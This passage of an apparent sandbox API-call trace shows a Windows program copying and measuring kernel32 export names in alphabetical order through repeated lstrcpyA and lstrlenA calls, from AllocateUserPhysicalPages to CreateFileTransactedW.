lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.112] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.112] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.112] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.112] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.112] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.112] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.112] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.112] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.112] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.112] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.112] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.112] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.112] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.113] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.113] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.113] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.113] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.113] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.113] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.113] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.113] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.113] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.113] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.113] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.113] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.113] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.113] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.113] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.113] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.113] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.113] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.113] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.114] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.114] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.114] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.114] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.114] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.114] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.114] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.114] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.114] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.114] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.114] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.114] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.114] lstrlenA (lpString="BEEP") returned 4 [0084.114] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.114] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.114] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.114] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.114] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.114] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.114] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.114] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.114] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.114] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.114] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.114] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.114] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.114] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.114] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.114] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.114] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.114] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.114] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.114] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.114] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.114] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.114] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.114] lstrlenA (lpString="CANCELIO") returned 8 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.115] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.115] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.115] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.115] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.115] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.115] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.115] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.115] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.115] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.115] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.115] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.115] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.115] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.115] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.115] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.115] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.115] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.115] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.115] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.115] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.116] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.116] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.116] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.116] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.116] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.116] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.116] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.116] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.116] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.116] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.116] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.116] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.116] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.116] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.116] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.116] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.116] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.116] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.116] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.117] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.117] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.117] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.117] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.117] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.117] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.117] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.117] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.117] lstrlenA (lpString="COPYFILEA") returned 9 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.117] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.117] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.117] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.117] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.117] lstrlenA (lpString="COPYFILEW") returned 9 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.117] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.117] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.117] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.117] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.117] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.117] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.118] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.118] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.118] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.118] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.118] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.118] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.118] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.118] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.118] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.118] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.118] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.118] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.118] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.118] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.118] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.118] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.118] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.118] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.118] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.118] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.118] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.118] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.118] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.118] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.118] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.118] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.118] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.118] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.118] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.118] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.118] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.118] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.118] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.118] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.118] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.118] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.118] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.119] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.119] lstrlenA 